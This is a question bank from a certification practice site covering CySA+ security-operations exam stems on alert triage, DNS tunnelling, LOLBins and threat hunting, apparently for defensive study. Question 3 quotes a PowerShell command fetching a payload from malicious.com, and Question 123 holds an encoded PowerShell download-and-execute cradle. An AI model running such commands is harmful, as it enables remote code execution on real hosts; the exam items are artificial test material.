Courseiva
Knowledge + Practice
CertificationsVendorsCareer RoadmapsLabs & ToolsStudy GuidesGlossaryPractice Questions
C
Courseiva

Free IT certification practice questions with explained answers for CCNA, CompTIA, AWS, Azure, Google Cloud, and more.

Certification Practice Questions

CCNA practice questionsSecurity+ SY0-701 practice questionsAWS SAA-C03 practice questionsAZ-104 practice questionsAZ-900 practice questionsCLF-C02 practice questionsA+ Core 1 practice questionsGoogle Cloud ACE practice questionsCySA+ CS0-003 practice questionsNetwork+ N10-009 practice questions
View all certifications →

Product

CertificationsCertification PathsExam TopicsPractice TestsExam Dumps vs Practice TestsStudy HubComparisons

Free Resources

Difficulty IndexLearn — Free ChaptersIT GlossaryFree Tools & LabsStudy GuidesCareer RoadmapsBrowse by VendorCisco Command ReferenceCCNA Scenarios

Company

AboutContactEditorial PolicyQuestion Writing PolicyTrust Center

Legal

Privacy PolicyTerms of Service

Courseiva is a free IT certification practice platform offering original exam-style practice questions, detailed explanations, topic-based practice, mock exams, readiness tracking, and study analytics for Cisco, CompTIA, Microsoft, AWS, and other technology certifications.

© 2026 Courseiva. Courseiva is operated by JTNetSolutions Ltd. All rights reserved.

Courseiva is an independent certification practice platform and is not affiliated with, endorsed by, or sponsored by Cisco, Microsoft, AWS, CompTIA, Google, ISC2, ISACA, or any other certification vendor. Vendor names and certification marks are used only to identify the exams learners are preparing for.

← Security Operations practice sets

CS0-003 Security Operations • Complete Question Bank

CS0-003 Security Operations — All Questions With Answers

Complete CS0-003 Security Operations question bank — all 0 questions with answers and detailed explanations.

165
Questions
Free
No signup
Certifications/CS0-003/Practice Test/Security Operations/All Questions
Question 1easymultiple choice
Read the full Security Operations explanation →

A security analyst is reviewing a SIEM alert that triggered on a single failed login attempt from an internal IP address to a domain controller at 3:00 AM. The user associated with the account is on vacation. Which classification best describes this alert?

Question 2mediummultiple choice
Read the full Security Operations explanation →

During a traffic analysis, a security analyst observes repeated outbound connections from an internal workstation to an external IP address on TCP port 53 at irregular intervals. The connections are small and occur every few minutes. Which technique is most likely being used?

Question 3hardmultiple choice
Read the full Security Operations explanation →

An analyst is investigating an EDR alert showing that 'powershell.exe' was launched by 'winword.exe' with the command: 'powershell -Command Invoke-WebRequest -Uri http://malicious.com/payload.ps1 -OutFile C:\Users\Public\payload.ps1'. Which LOLBin technique is being observed?

Question 4mediummultiple choice
Read the full Security Operations explanation →

A vulnerability scan report shows a critical vulnerability with a CVSS score of 9.8 on an internal web server. The server is not internet-facing and is protected by a compensating control: a web application firewall (WAF) that blocks the attack vector. What should the analyst recommend?

Question 5easymultiple choice
Read the full Security Operations explanation →

A security analyst notices a high number of alerts from a new detection rule that triggers on 'any outbound connection to a known malicious IP'. After investigation, the analyst finds that the IP address is from a threat intelligence feed but the connections are actually from a legitimate security scanner that was recently deployed. How should the analyst handle this?

Question 6mediummultiple choice
Read the full network assurance explanation →

An analyst is reviewing NetFlow data and notices a large amount of data being transferred from an internal database server to an external IP address on port 443 during non-business hours. The database server is not expected to initiate outbound connections. Which type of activity is most likely occurring?

Question 7hardmultiple choice
Read the full Security Operations explanation →

During a memory analysis of a compromised host, an analyst finds that 'svchost.exe' is running from 'C:\Users\Public\svchost.exe' instead of 'C:\Windows\System32\svchost.exe'. The process has injected code into a legitimate 'explorer.exe' process. What technique is being observed?

Question 8mediummultiple choice
Read the full Security Operations explanation →

A security analyst is configuring a vulnerability scanner for internal infrastructure. Management wants to minimize disruption to critical systems while ensuring accurate results. Which scan configuration should the analyst recommend?

Question 9easymultiple choice
Read the full Security Operations explanation →

An analyst is using AWS GuardDuty and sees a finding that an EC2 instance is communicating with a known command-and-control (C2) IP address. What type of alert is this?

Question 10mediummultiple choice
Read the full Security Operations explanation →

A threat hunter is creating a hypothesis based on the MITRE ATT&CK framework. The hunter wants to detect adversaries using PowerShell to download files from remote servers. Which ATT&CK technique should the hunter focus on?

Question 11hardmultiple choice
Read the full Security Operations explanation →

An analyst is reviewing logs from multiple sources and sees that a user logged into a workstation at 8:00 AM, then the same user logged into a server in a different building at 8:01 AM. The authentication logs show the same source IP for both logins. What should the analyst suspect?

Question 12mediummultiple choice
Read the full Security Operations explanation →

A security analyst is creating a correlation rule in the SIEM to detect DGA (Domain Generation Algorithm) activity. Which of the following data points would be most useful to include in the rule?

Question 13mediummulti select
Read the full Security Operations explanation →

A security analyst is investigating a potential data exfiltration incident. The analyst observes the following network traffic from an internal host: Outbound connections to an external IP on port 22, large data transfers during off-hours, and the use of SCP. Which two indicators of compromise (IOCs) are most relevant? (Select TWO.)

Question 14hardmulti select
Read the full Security Operations explanation →

A security analyst is conducting a proactive threat hunt for lateral movement techniques. The analyst examines EDR data for unusual parent-child process relationships. Which three process chains are indicative of lateral movement? (Select THREE.)

Question 15mediummulti select
Read the full Security Operations explanation →

A security team is tuning a SIEM rule that alerts on all outbound connections to IP addresses classified as 'high risk' by threat intelligence. The rule generates many false positives because some legitimate services use these IPs. Which two actions should the analyst take to reduce false positives? (Select TWO.)

Question 16easymultiple choice
Read the full Security Operations explanation →

A security analyst reviews a SIEM alert that fired when a user successfully logged into a server from a remote IP address at 3 AM. The user is a system administrator who often works late. What is the most appropriate initial classification of this alert?

Question 17mediummultiple choice
Read the full Security Operations explanation →

During a network traffic analysis, a security analyst observes repeated connections from an internal host to an external IP address on TCP port 53. The traffic volume is low but consistent. What type of anomaly is most likely indicated?

Question 18mediummultiple choice
Read the full Security Operations explanation →

A security analyst is triaging an alert from the EDR that shows the process 'powershell.exe' with a parent process of 'winword.exe'. The user recently opened a document from an email. What is the most likely explanation?

Question 19easymultiple choice
Read the full Security Operations explanation →

A vulnerability scan report shows a critical vulnerability with a CVSS score of 10.0. The application team states that the affected service is isolated in a DMZ and has no access to sensitive data. What should the analyst consider?

Question 20mediummultiple choice
Read the full Security Operations explanation →

A threat intelligence report indicates that a known APT group is using 'regsvr32.exe' to execute malicious code. Which detection rule type would be most effective in identifying this technique across multiple endpoints?

Question 21hardmultiple choice
Read the full Security Operations explanation →

An analyst examines a memory dump from a compromised host and finds that 'svchost.exe' is executing code from a memory region that is not backed by any executable file. What technique is most likely being used?

Question 22mediummultiple choice
Read the full Security Operations explanation →

A cloud security analyst reviews AWS CloudTrail logs and notices multiple 'RunInstances' API calls from a single IAM user creating EC2 instances with public IP addresses in an unusual region. What is the most likely concern?

Question 23easymultiple choice
Read the full Security Operations explanation →

Which analysis technique involves examining the parent-child relationships of processes to identify potentially malicious activity?

Question 24mediummultiple choice
Read the full Security Operations explanation →

A security analyst notices that a firewall log shows outbound traffic from an internal server to an external IP address on TCP port 443, but the server is not configured to make any outbound connections. The analyst checks previous logs and finds similar connections every 60 minutes. What type of activity is most likely occurring?

Question 25hardmultiple choice
Read the full Security Operations explanation →

During a threat hunt, an analyst queries osquery to find processes where the 'cmdline' contains ' -e ' and the parent process is not 'explorer.exe'. This query is designed to detect which technique?

Question 26mediummultiple choice
Read the full Security Operations explanation →

A security analyst is configuring a SIEM correlation rule to detect potential brute-force attacks. Which log source combination is most appropriate for this rule?

Question 27hardmultiple choice
Read the full Security Operations explanation →

An analyst is investigating a suspected data exfiltration via HTTP. The analyst examines a PCAP file and finds a series of HTTP POST requests to an external site with varying 'Content-Length' values. The payloads appear to be base64-encoded strings. Which tool would be most effective for extracting and decoding the payloads for analysis?

Question 28mediummulti select
Read the full Security Operations explanation →

A security analyst is tuning a SIEM rule that generates alerts for any failed login attempt. The rule produces too many alerts, overwhelming the team. Which TWO actions would most effectively reduce false positives while maintaining detection of actual brute-force attacks?

Question 29mediummulti select
Read the full Security Operations explanation →

A security analyst is hunting for signs of lateral movement in the network. Which THREE indicators are most consistent with lateral movement techniques?

Question 30hardmulti select
Read the full Security Operations explanation →

An analyst is reviewing a CASB alert indicating that a user accessed a cloud application from a geolocation that is not typical for the organization. Which THREE additional data sources would be most helpful to determine if the activity is malicious?

Question 31easymultiple choice
Read the full Security Operations explanation →

A security analyst is reviewing a SIEM alert for a single failed login attempt from an internal IP address to a file server. The analyst determines this is a false positive. Which step should the analyst take next?

Question 32mediummultiple choice
Read the full Security Operations explanation →

During a network traffic analysis, a security analyst observes repeated connections from an internal host to a known malicious IP on port 4444. The payload appears to be encrypted. Which type of activity is most likely indicated?

Question 33hardmultiple choice
Read the full Security Operations explanation →

A threat hunter notices that a legitimate Windows binary 'rundll32.exe' is executing with network connections to an external IP address. The parent process is 'winword.exe'. Which LOLBin technique is most likely being used?

Question 34easymultiple choice
Read the full Security Operations explanation →

A vulnerability scan report shows a critical finding with a CVSS score of 9.8. The system is a web server behind a WAF that blocks the attack vector. What should the analyst do?

Question 35mediummultiple choice
Read the full Security Operations explanation →

An analyst reviews AWS CloudTrail logs and detects multiple 'CreateNetworkAclEntry' API calls from a user who does not typically perform network administration. What type of activity is this?

Question 36mediummultiple choice
Read the full Security Operations explanation →

A security analyst is creating a Sigma rule to detect suspicious usage of 'schtasks.exe' to create a scheduled task that runs an encoded PowerShell command. Which log source is most appropriate for this rule?

Question 37hardmultiple choice
Read the full Security Operations explanation →

During memory analysis of a compromised host, an analyst finds a process that appears to be 'svchost.exe' but with an unusual parent process (not 'services.exe'). The process also has injected code in its memory. What is the most likely explanation?

Question 38mediummultiple choice
Read the full DNS explanation →

An analyst is investigating a potential data exfiltration via DNS. Which tool would best help identify DNS tunnelling by analyzing packet payloads and query patterns?

Question 39easymultiple choice
Read the full Security Operations explanation →

An organization wants to detect threats in their AWS environment using a cloud-native service that monitors for suspicious API calls and potential credential compromise. Which service should they use?

Question 40mediummultiple choice
Read the full Security Operations explanation →

A security analyst is triaging a SIEM alert for 'Multiple failed logins followed by a successful login from a remote IP'. The successful login occurs after 10 failed attempts. What is the most likely classification?

Question 41mediummultiple choice
Read the full Security Operations explanation →

An analyst detects a process named 'powershell.exe' executing a base64-encoded command. Which type of analysis is most appropriate to decode and understand the command?

Question 42hardmultiple choice
Read the full Security Operations explanation →

An analyst is investigating a host that communicates with a domain using a DGA-like algorithm. The domain name appears random and resolves to different IPs over time. Which threat-hunting technique would best identify the DGA pattern?

Question 43mediummulti select
Read the full Security Operations explanation →

A security analyst is configuring a vulnerability scanner for an internal network. Which two settings are most important for reducing false positives during the scan? (Choose two.)

Question 44hardmulti select
Read the full Security Operations explanation →

During an incident response, an analyst identifies suspicious registry modifications in the 'Run' key and a scheduled task that executes a script. Which three persistence mechanisms are most likely being used? (Choose three.)

Question 45mediummulti select
Read the full Security Operations explanation →

An analyst is creating a detection rule for lateral movement using SMB. Which two network indicators should be included in the rule? (Choose two.)

Question 46easymultiple choice
Read the full Security Operations explanation →

A security analyst is reviewing SIEM alerts and notices a high volume of alerts for a specific event ID that has been determined to be benign. Which action should the analyst take to reduce noise?

Question 47mediummultiple choice
Read the full Security Operations explanation →

During a network traffic analysis, a security analyst observes repeated TCP SYN packets sent to a host that responds with SYN-ACK, but the connection never completes. What type of anomaly is this?

Question 48hardmultiple choice
Read the full Security Operations explanation →

A security analyst is investigating an alert from an endpoint EDR that shows a process with a parent-child relationship where the parent is Microsoft Word and the child process is wscript.exe executing a command to download a PowerShell script. Which MITRE ATT&CK technique does this likely represent?

Question 49mediummultiple choice
Read the full Security Operations explanation →

A security team is reviewing cloud audit logs from AWS CloudTrail and notices repeated API calls to create EC2 instances in a region where the organization has no presence. What is the most likely cause?

Question 50easymultiple choice
Read the full DNS explanation →

Which of the following log sources would be most useful for detecting DNS tunneling?

Question 51mediummultiple choice
Read the full Security Operations explanation →

A vulnerability scan report shows a critical vulnerability on a web server. The server is behind a WAF that blocks the relevant exploit payloads. According to the organization's risk management policy, what should the analyst do?

Question 52hardmultiple choice
Read the full Security Operations explanation →

A threat hunter is creating a Sigma rule to detect a specific TTP where an attacker uses reg.exe to create a Run key for persistence. Which of the following Sigma rule event selectors would best detect this activity?

Question 53mediummultiple choice
Read the full Security Operations explanation →

An analyst is investigating a suspicious email attachment. The sandbox analysis shows that the document drops a binary that connects to an external IP on port 4444. Which network analysis tool is best suited to confirm if any internal hosts are communicating on that port?

Question 54easymultiple choice
Read the full Security Operations explanation →

A security analyst is configuring a vulnerability scanner to evaluate the security posture of internal servers. Which type of scan provides the most accurate assessment of missing patches?

Question 55mediummultiple choice
Read the full DNS explanation →

During a threat hunt, an analyst notices repeated DNS queries for random-looking subdomains under a legitimate domain. The domains have high entropy and never existed before. What technique is most likely being used?

Question 56hardmultiple choice
Read the full Security Operations explanation →

An analyst is reviewing a memory dump from a compromised workstation and finds a process that appears to be a legitimate system process but has a different parent process and is running from a non-standard location. Which analysis technique is most appropriate?

Question 57mediummultiple choice
Read the full Security Operations explanation →

A CASB alert indicates that a user downloaded a file containing sensitive data from a cloud app to an unmanaged device. Which action should the analyst take first?

Question 58mediummulti select
Read the full DNS explanation →

A security analyst is investigating a potential data exfiltration using DNS. Which TWO indicators are most consistent with DNS tunneling?

Question 59hardmulti select
Read the full Security Operations explanation →

A threat hunter is using osquery to look for persistence mechanisms on a set of Windows endpoints. Which THREE registry keys or scheduled tasks should the hunter check for common persistence?

Question 60easymulti select
Read the full Security Operations explanation →

An analyst is configuring correlation rules in a SIEM. Which TWO data sources are essential for detecting lateral movement using pass-the-hash attacks?

Question 61mediummultiple choice
Read the full DNS explanation →

A security analyst notices repeated alerts for 'DNS query to known malicious domain' from multiple internal hosts. Upon investigation, the analyst finds that the domain is legitimate and used by a third-party service. What should the analyst do to reduce false positives?

Question 62hardmultiple choice
Read the full Security Operations explanation →

During a threat hunt, an analyst uses osquery to query endpoints for processes that have spawned from Microsoft Word but have network connections. Which of the following TTPs does this technique most likely detect?

Question 63easymultiple choice
Read the full network assurance explanation →

A security analyst is reviewing a NetFlow record that shows a large amount of data being transferred from an internal server to an external IP address on port 443 during non-business hours. Which type of activity should the analyst suspect?

Question 64mediummultiple choice
Read the full Security Operations explanation →

An analyst receives an alert that a user's workstation contacted a known command-and-control (C2) IP address. The analyst checks the EDR logs and finds that the process 'svchost.exe' initiated the connection. What should the analyst do next to determine if this is a true positive?

Question 65mediummultiple choice
Read the full Security Operations explanation →

A vulnerability scan of an internal web server shows a critical vulnerability with a CVSS score of 9.8. The server is behind a WAF and is only accessible from internal IPs. Which of the following is the best next step?

Question 66easymultiple choice
Read the full Security Operations explanation →

Which of the following is a primary benefit of using credentialed vulnerability scans over non-credentialed scans?

Question 67mediummultiple choice
Read the full DNS explanation →

A security analyst is investigating a potential DNS tunneling attack. Which of the following patterns in DNS logs would most likely indicate such activity?

Question 68mediummultiple choice
Read the full Security Operations explanation →

An analyst is creating a YARA rule to detect a specific malware family that uses the string 'evil' in its PE file. Which of the following rule structures is correct?

Question 69hardmultiple choice
Read the full Security Operations explanation →

During a cloud security investigation, an analyst notices that an AWS IAM user generated multiple 'CreateKeyPair' API calls from an IP address outside the corporate network. Which AWS service is best suited to detect this type of anomalous behavior?

Question 70mediummultiple choice
Read the full Security Operations explanation →

An analyst is triaging a SIEM alert that fires when a single host makes more than 100 outbound connections to unique IPs within one minute. The analyst finds that the host is a web server responding to legitimate client requests. What is the best action to reduce false positives?

Question 71easymultiple choice
Read the full Security Operations explanation →

Which of the following is a persistence mechanism that involves modifying the Windows Registry to execute a program when a user logs in?

Question 72hardmultiple choice
Read the full network assurance explanation →

An analyst suspects a process hollowing attack on an endpoint. Which of the following EDR telemetry findings would best support this hypothesis?

Question 73mediummulti select
Read the full Security Operations explanation →

A security analyst is reviewing network traffic and suspects a host is infected with malware that uses a domain generation algorithm (DGA) for C2 communication. Which two of the following indicators are most consistent with DGA activity?

Question 74mediummulti select
Read the full Security Operations explanation →

During a threat hunt, an analyst is looking for signs of lateral movement using pass-the-hash. Which three of the following log sources would be most useful for detecting this technique?

Question 75hardmulti select
Read the full Security Operations explanation →

An analyst is investigating a potential data exfiltration incident. The analyst observes repeated HTTPS connections to a cloud storage provider from a server that does not normally use that service. Which three additional artifacts would strengthen the case for exfiltration?

Question 76mediummultiple choice
Read the full Security Operations explanation →

A SOC analyst receives an alert from the SIEM indicating a high volume of outbound traffic from a single workstation to an IP address in a country where the organization does no business. The alert is based on a rule that triggers when outbound traffic exceeds 1 GB in 5 minutes. Upon investigation, the analyst finds that the workstation is used by a developer who downloaded a large dataset from a cloud storage service. Which action should the analyst take to improve the alert's accuracy without disabling it entirely?

Question 77easymultiple choice
Read the full Security Operations explanation →

A security analyst is reviewing logs from multiple sources to investigate a potential intrusion. Which log source would provide the most reliable evidence of successful authentication from an unusual location?

Question 78mediummultiple choice
Read the full Security Operations explanation →

During a traffic analysis, a security analyst notices repeated TCP SYN packets sent to an internal server from an external IP, but the server never responds with SYN-ACK. The external IP sends a new SYN packet every 30 seconds. What does this behavior most likely indicate?

Question 79hardmultiple choice
Read the full network assurance explanation →

A threat hunter is analyzing EDR telemetry and discovers that the process svchost.exe spawned a child process powershell.exe. The powershell.exe then established a network connection to an external IP address. Which of the following best describes this behavior in the context of threat hunting?

Question 80easymultiple choice
Read the full Security Operations explanation →

A vulnerability scan report shows a critical vulnerability with a CVSS score of 9.8 on a web server. However, the server is only accessible from internal IP addresses and is protected by a Web Application Firewall (WAF) that blocks the attack vector. Which of the following should the analyst recommend?

Question 81mediummultiple choice
Read the full Security Operations explanation →

An analyst is investigating an alert from AWS GuardDuty that indicates an EC2 instance is communicating with a known malicious IP address. The analyst checks the VPC Flow Logs and confirms the communication. What is the next best step in the investigation?

Question 82hardmultiple choice
Read the full DNS explanation →

A security analyst is reviewing DNS logs and notices that a workstation is making frequent queries to domains with random-looking strings, such as 'a3b9f2d1.example.com'. These domains resolve to different IP addresses each time. Which type of activity is most likely being observed?

Question 83easymultiple choice
Read the full Security Operations explanation →

Which tool would best allow a security analyst to capture and analyze packets in real time to investigate a network anomaly?

Question 84mediummultiple choice
Read the full Security Operations explanation →

A SOC analyst is triaging a SIEM alert for a registry modification on a workstation. The alert indicates a new Run key was added under HKCU\Software\Microsoft\Windows\CurrentVersion\Run. Which of the following is the most likely purpose of this modification?

Question 85mediummultiple choice
Read the full Security Operations explanation →

During a threat hunting exercise, a hunter creates a hypothesis that a threat actor is using PowerShell to download payloads from a remote server. Which ATT&CK technique is the hunter most likely investigating?

Question 86hardmultiple choice
Read the full Security Operations explanation →

An analyst is reviewing a memory dump of a compromised system and notices that the memory of a legitimate process (e.g., notepad.exe) contains a PE header and executable code that is not part of the original binary. Which technique is most likely being used?

Question 87mediummultiple choice
Read the full Security Operations explanation →

A security analyst is configuring a vulnerability scanner for internal network scanning. The analyst wants to ensure the scanner can identify missing patches and software configurations that require administrative privileges to read. Which scan type should the analyst configure?

Question 88mediummulti select
Read the full Security Operations explanation →

A SOC analyst is investigating an alert from Azure Sentinel indicating a user account logged in from an unfamiliar location. The analyst wants to determine if this is a true positive. Which TWO additional log sources should the analyst correlate to make an informed decision?

Question 89hardmulti select
Read the full DNS explanation →

A threat hunter is analyzing network traffic and observes a system making outbound connections to multiple IP addresses on port 53 (DNS) with unusually large payload sizes. The hunter suspects DNS tunneling. Which THREE characteristics are indicative of DNS tunneling?

Question 90mediummulti select
Read the full Security Operations explanation →

An analyst is creating a Sigma rule to detect suspicious use of rundll32.exe to execute DLL files from temporary directories. Which TWO fields should the analyst include in the rule to minimize false positives?

Question 91mediummultiple choice
Read the full Security Operations explanation →

A SOC analyst receives an alert from the SIEM indicating a high volume of outbound traffic from a single workstation to an external IP address on port 22. Upon investigation, the analyst finds the workstation is used by a developer who frequently transfers large files to a remote server via SCP. What is the most appropriate classification for this alert?

Question 92hardmultiple choice
Read the full Security Operations explanation →

During a threat hunting exercise, an analyst uses osquery to query process events on endpoints. They discover a process named 'svchost.exe' running under a user account with parent process 'cmd.exe'. Which of the following describes this observation?

Question 93easymultiple choice
Read the full network assurance explanation →

A security analyst is reviewing NetFlow data and notices a significant amount of traffic from an internal host to a known malicious IP address on port 443. What tool would be most effective for further analyzing the payload of this traffic?

Question 94mediummultiple choice
Read the full Security Operations explanation →

A security engineer is configuring a new SIEM correlation rule to detect lateral movement. Which of the following log sources would provide the most relevant data for detecting pass-the-hash attacks?

Question 95mediummultiple choice
Read the full Security Operations explanation →

During a vulnerability scan of internal hosts, a security analyst finds a critical vulnerability with a CVSS score of 9.8. The affected system is a legacy application that cannot be patched immediately. What should the analyst do next?

Question 96hardmultiple choice
Read the full Security Operations explanation →

A SOC analyst is investigating an alert from AWS GuardDuty that indicates 'UnauthorizedAccess:EC2/SSHBruteForce'. The analyst reviews CloudTrail logs and sees multiple failed SSH login attempts from a single IP address. What initial triage action should the analyst take?

Question 97easymultiple choice
Read the full DNS explanation →

Which of the following is the best data source for detecting DNS tunneling activity?

Question 98mediummultiple choice
Read the full Security Operations explanation →

A threat hunter is creating a hypothesis based on recent threat intelligence about a new ransomware variant that uses scheduled tasks for persistence. Which of the following MITRE ATT&CK techniques should the hunter focus on?

Question 99hardmultiple choice
Read the full Security Operations explanation →

An analyst is reviewing a YARA rule that triggers on a specific string pattern in memory. The rule has a high false positive rate. Which of the following actions would best reduce false positives while maintaining detection capability?

Question 100easymultiple choice
Read the full Security Operations explanation →

What is the primary purpose of performing credentialed vulnerability scans?

Question 101mediummultiple choice
Read the full DNS explanation →

A security analyst is investigating a potential data exfiltration incident. They notice a host sending large amounts of data to an external IP address using DNS queries. Which technique is most likely being used?

Question 102mediummultiple choice
Read the full Security Operations explanation →

During a memory analysis of a potentially compromised host, a security analyst finds a process with an executable image that is not present on disk. Which technique is most likely being observed?

Question 103mediummulti select
Read the full Security Operations explanation →

A security analyst is tuning a SIEM rule that generates alerts for every failed login attempt. The rule is causing alert fatigue. Which TWO actions would reduce false positives while maintaining security visibility?

Question 104hardmulti select
Read the full Security Operations explanation →

During a threat hunt, an analyst uses Velociraptor to collect forensic artifacts from endpoints. Which THREE of the following artifacts are most useful for detecting persistence mechanisms?

Question 105easymulti select
Read the full Security Operations explanation →

A SOC team is evaluating cloud-native security monitoring tools. Which TWO of the following are AWS services specifically designed for threat detection and security monitoring?

Question 106mediummultiple choice
Read the full Security Operations explanation →

A security analyst is reviewing a SIEM alert indicating a high number of failed authentication attempts from a single IP address against multiple user accounts. The analyst checks the logs and finds the IP belongs to a known vulnerability scanner used by the internal security team. How should the analyst classify this alert?

Question 107easymultiple choice
Read the full Security Operations explanation →

During a network traffic review, an analyst notices encrypted traffic to an unusual external IP address on TCP port 53. What is the most likely anomaly this indicates?

Question 108hardmultiple choice
Read the full network assurance explanation →

An analyst is investigating a potential compromise on a Windows endpoint. EDR telemetry shows that 'powershell.exe' was launched by 'svchost.exe', which in turn was spawned by 'services.exe'. The analyst observes that 'powershell.exe' then executed a script that downloaded an executable. What should the analyst be most concerned about?

Question 109mediummultiple choice
Read the full Security Operations explanation →

A security analyst is configuring a vulnerability scanner to assess internal servers. The goal is to identify missing patches and misconfigurations without impacting system performance. Which scan configuration is most appropriate?

Question 110mediummultiple choice
Read the full Security Operations explanation →

A security analyst is investigating a series of alerts from AWS GuardDuty indicating 'UnauthorizedAccess:EC2/SSHBruteForce'. The affected EC2 instance has a high CPU load. The analyst checks the security group rules and finds that SSH (port 22) is open to 0.0.0.0/0. What is the best immediate remediation action?

Question 111easymultiple choice
Read the full Security Operations explanation →

Which of the following is the primary purpose of log normalisation in a SIEM?

Question 112hardmultiple choice
Read the full Security Operations explanation →

An analyst is reviewing a packet capture and observes a series of TCP SYN packets sent to a server, each followed by a SYN-ACK from the server, but no ACK from the client. The source IP is spoofed. What type of attack is most likely occurring?

Question 113mediummultiple choice
Read the full Security Operations explanation →

During a threat hunting exercise, an analyst creates a hypothesis that a threat actor may be using scheduled tasks for persistence. Which Windows registry key or log source should the analyst examine to confirm the hypothesis?

Question 114easymultiple choice
Read the full Security Operations explanation →

An analyst needs to capture network traffic on a Linux server to investigate a potential data exfiltration. Which command-line tool is best suited for real-time packet capture and analysis?

Question 115mediummultiple choice
Read the full Security Operations explanation →

A security analyst is tuning a SIEM rule that triggers on any process creation event involving 'rundll32.exe'. The rule generates many false positives from legitimate software updates. Which tuning action would most effectively reduce false positives while maintaining detection of malicious use?

Question 116hardmultiple choice
Read the full Security Operations explanation →

An analyst is investigating a potential memory injection attack on a Windows system. Which of the following memory analysis artifacts is most indicative of code injection?

Question 117easymultiple choice
Read the full Security Operations explanation →

Which log source would best help detect an attacker using a domain generation algorithm (DGA) to communicate with a command and control server?

Question 118mediummulti select
Read the full Security Operations explanation →

A security analyst is reviewing a CASB alert indicating a user is accessing a cloud storage application from an unusual location. The analyst needs to investigate further. Which TWO actions are most appropriate?

Question 119hardmulti select
Read the full Security Operations explanation →

During a threat hunt, an analyst identifies a suspicious process that is making outbound connections to multiple IP addresses on port 443 using TLS. The analyst suspects data exfiltration. Which THREE techniques would best help confirm this hypothesis?

Question 120mediummulti select
Read the full Security Operations explanation →

A security analyst is creating a Sigma rule to detect use of the LOLBin 'certutil' for downloading payloads. Which THREE command-line arguments should the rule look for to indicate malicious use?

Question 121easymultiple choice
Read the full Security Operations explanation →

A security analyst is reviewing a SIEM alert that triggered on a single failed login attempt from an internal IP address. The username used does not exist in Active Directory. The analyst checks the source IP and finds it belongs to a known vulnerability scanner. What classification should the analyst assign to this alert?

Question 122mediummultiple choice
Read the full Security Operations explanation →

During a network traffic analysis, a security analyst notices a host communicating with an external IP address over TCP port 443 using a self-signed certificate. The traffic flows are consistent in size and occur every 60 seconds. The external IP is not on any threat intelligence feeds. What does this pattern most likely indicate?

Question 123hardmultiple choice
Read the full Security Operations explanation →

An EDR agent reports that the process 'svchost.exe' spawned 'powershell.exe' with the command line: 'powershell -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvADEAOQAyAC4AMQA2ADgALgAxAC4AMQAwAC8AcABhAHkAbABvAGEAZAAuAGUAeABlACcAKQA='. Which of the following is the most appropriate classification for this activity?

Question 124mediummultiple choice
Read the full Security Operations explanation →

A security analyst is tuning a SIEM correlation rule that generates alerts when a single user logs into more than 10 workstations within 5 minutes. The rule is producing excessive false positives due to service accounts performing automated tasks. Which of the following is the best tuning approach to reduce false positives while still detecting potential lateral movement?

Question 125mediummultiple choice
Read the full Security Operations explanation →

During a vulnerability scan of an internal web server, the scanner reports a critical vulnerability with a CVSS score of 9.8. The server is behind a WAF that blocks the attack vector. The system owner states the vulnerability is not exploitable due to the compensating control. Which of the following is the best next step?

Question 126easymultiple choice
Read the full Security Operations explanation →

A security analyst is investigating an alert from AWS GuardDuty that indicates an EC2 instance is communicating with a known malicious IP address on port 4444. The analyst checks the VPC Flow Logs and confirms the traffic. Which of the following is the most appropriate immediate action?

Question 127mediummultiple choice
Read the full Security Operations explanation →

A threat hunter is reviewing osquery data from endpoints and notices that the Windows Registry key 'HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' contains an entry for 'C:\Users\Public\svchost.exe'. Which of the following best describes the significance of this finding?

Question 128hardmultiple choice
Read the full DNS explanation →

A security analyst uses Wireshark to capture traffic and notices an unusually high number of DNS queries for random-looking subdomains under a single domain, such as 'a1b2c3.malicious.com'. The TTL values are very low. The analyst suspects DNS tunneling. Which of the following additional indicators would most strongly support this hypothesis?

Question 129easymultiple choice
Read the full Security Operations explanation →

An organization wants to perform vulnerability scanning on internal servers that contain sensitive data. The scanning team is concerned about causing service disruptions. Which type of scan should be recommended to minimize risk?

Question 130mediummultiple choice
Read the full Security Operations explanation →

A security analyst is reviewing an alert from a CASB that shows a user downloading a large volume of sensitive data from a cloud storage application to a personal device outside of business hours. The user's behavior is atypical. Which of the following is the most likely interpretation?

Question 131mediummultiple choice
Read the full Security Operations explanation →

During a threat hunting engagement, a hunter creates a hypothesis that adversaries may be using PowerShell to perform reconnaissance via Active Directory cmdlets. The hunter decides to look for events where PowerShell loaded the ActiveDirectory module. Which of the following detection techniques is most appropriate?

Question 132hardmultiple choice
Read the full network assurance explanation →

A threat hunter analyzes NetFlow data and observes a host communicating with multiple external IP addresses on high-numbered ports (e.g., 49300-49500) during off-hours. The communications are short-lived and occur in burst patterns. The hunter suspects data exfiltration. Which of the following analysis techniques would best confirm or refute this suspicion?

Question 133mediummulti select
Read the full Security Operations explanation →

A security analyst is investigating an alert from Azure Sentinel that indicates a user account has logged in from a geographically improbable location. The analyst needs to determine if this is a true positive. Which TWO additional data sources should the analyst examine? (Choose TWO.)

Question 134mediummulti select
Read the full Security Operations explanation →

A security analyst is creating a SIEM correlation rule to detect lateral movement using pass-the-hash attacks. The rule should trigger when multiple successful logins occur from a single source to multiple destinations using NTLM authentication. Which THREE log sources are essential for this rule? (Choose THREE.)

Question 135hardmulti select
Read the full Security Operations explanation →

A security analyst is investigating a potential advanced persistent threat (APT) that uses living off the land binaries (LOLBins). The EDR has flagged several processes. Which THREE process behaviors are most indicative of LOLBin abuse? (Choose THREE.)

Question 136easymultiple choice
Read the full Security Operations explanation →

A security analyst is reviewing a SIEM alert that triggered on a single failed login attempt from a known internal IP address to a file server. The user authenticated successfully on the next attempt. Which classification best describes this alert?

Question 137easymultiple choice
Read the full Security Operations explanation →

During a vulnerability scan of an internal web server, the scanner reports a critical vulnerability with a CVSS score of 9.8. The analyst reviews the finding and determines that the vulnerability is mitigated by a Web Application Firewall (WAF) deployed in front of the server. What should the analyst do with this finding?

Question 138mediummultiple choice
Read the full DNS explanation →

An analyst is reviewing network traffic logs and notices a series of connections from an internal workstation to an external IP address on TCP port 53. The traffic consists of large DNS queries with random-looking subdomains. Which technique is most likely being used?

Question 139mediummultiple choice
Read the full Security Operations explanation →

